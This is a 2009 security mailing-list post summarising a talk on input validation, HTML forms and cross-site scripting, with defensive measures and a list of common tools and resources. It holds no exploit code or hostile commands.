[Security] Notes from last night's security talk

aestetix aestetix aestetix at gmail.com
Fri Oct 23 13:50:53 UTC 2009


I figured I should post this before I forget.

We covered the fundamentals.... what is input validation, the basic
relationship between a client and a server.

Next, showed how HTML forms work, and how you can use server response from
forms to manipulate data. Used this to explain cross site scripting.

Then went over what happens when you bring javascript into the mix, gave
some scary (or funny) examples of stuff that really happened.

Covered basic security resolutions: whitelisting (hash tables, regex,
dictionaries...), NoScript, and a few other things.

A few good resources for those who attended (or those who missed):

Tools of the trade: LiveHTTPHeaders, NoScript, Web Developer Toolkit, Paros
Proxy, Burpsuite
Names to follow: Jeremiah Grossman, Billy Hoffmann, RSnake
Sites to check out: gnucitizen.org, ha.ckers.org

I'll be out of town next week. Anyone feel like giving a talk or workshop?
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://www.noisebridge.net/pipermail/security/attachments/20091023/5c9f5065/attachment-0002.html>


More information about the Security mailing list